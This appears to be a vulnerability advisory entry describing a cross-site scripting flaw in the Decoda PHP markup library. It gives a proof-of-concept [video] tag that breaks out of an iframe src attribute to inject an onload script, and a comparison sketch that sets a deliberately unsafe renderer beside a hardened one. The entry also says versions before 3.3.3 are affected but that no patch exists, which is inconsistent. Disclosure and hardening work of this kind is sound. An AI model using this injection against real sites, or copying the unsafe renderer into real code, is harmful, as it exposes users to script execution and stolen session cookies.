Decoda cross-site scripting vulnerability

2012-05-14T00:00:00
ID MYHACK58:62201233873
Type myhack58
Reporter Anonymous
Modified 2012-05-14T00:00:00

Description

Versions of Decoda prior to 3.3.3 contain a cross-site scripting vulnerability because user-supplied input is not properly filtered.

An attacker can exploit this vulnerability to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and then launch other attacks.

The vendor has not yet provided a patch or upgrade for this vulnerability. Users of this software are advised to watch the vendor's home page for the latest version.

The following proof of concept demonstrates the issue:

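<?php
// Load Decoda and enable the video filter that handles [video] tags
include '../decoda/Decoda.php';
$code = new Decoda();
$code->addFilter(new VideoFilter());
?>

<?php
// The tag content begins with a double quote, which closes the src attribute
$decoda_markup = '[video="youtube" size="small"]"';
// The rest of the content is then parsed by the browser as new attributes
$decoda_markup .= 'onload="alert(\'RedTeam Pentesting XSS\');" id="[/video]';
$code->reset($decoda_markup);
echo $code->parse();
?>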

This results in the following output (whitespace adjusted):

<iframe src="http://www.xxxx.com/embed/"
onload="alert('RedTeam Pentesting XSS');" id=""
width="560" height="315" frameborder="0"></iframe>

Excerpted from 90's Blog
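
For comparison, a standalone sketch of the flaw class shown in the proof of concept next to a hardened renderer. It is an added example, not Decoda's code or the vendor's fix; the function names, the placeholder embed host and the assumed ID format are hypothetical.

```php
<?php
// Added example: standalone sketch, not Decoda's VideoFilter implementation.
// Hypothetical names: EMBED_BASE, render_video_unsafe(), render_video_safe().

const EMBED_BASE = 'https://video.example/embed/'; // placeholder host (assumption)

// Same flaw class as the output above: the tag content is concatenated into
// an attribute value with no validation and no escaping.
function render_video_unsafe(string $id): string
{
    return '<iframe src="' . EMBED_BASE . $id
         . '" width="560" height="315" frameborder="0"></iframe>';
}

// Hardened form: allowlist the identifier, then escape for attribute context.
function render_video_safe(string $id): ?string
{
    // Assumed ID format: letters, digits, '_' and '-', at most 32 characters.
    // \A and \z anchor the whole string; '$' would accept a trailing newline.
    if (preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $id) !== 1) {
        return null; // caller emits nothing, or the original text escaped
    }
    // Escaping is kept even after validation so that a later loosening of
    // the pattern cannot reopen the attribute break-out.
    $src = htmlspecialchars(EMBED_BASE . $id, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<iframe src="' . $src
         . '" width="560" height="315" frameborder="0"></iframe>';
}

// Constructed input: the [video] tag content from the proof of concept above.
$payload = '"onload="alert(\'RedTeam Pentesting XSS\');" id="';

// The leading quote ends src, so onload becomes a separate attribute.
echo render_video_unsafe($payload), PHP_EOL;

// Rejected by the allowlist: nothing is rendered for this input.
var_dump(render_video_safe($payload));

// Constructed well-formed ID: rendered with an intact src attribute.
echo render_video_safe('abc123XYZ_-'), PHP_EOL;

// Escape-only fallback for displaying rejected input as text: the quotes
// become entities and can no longer terminate an attribute value.
echo htmlspecialchars($payload, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'), PHP_EOL;
```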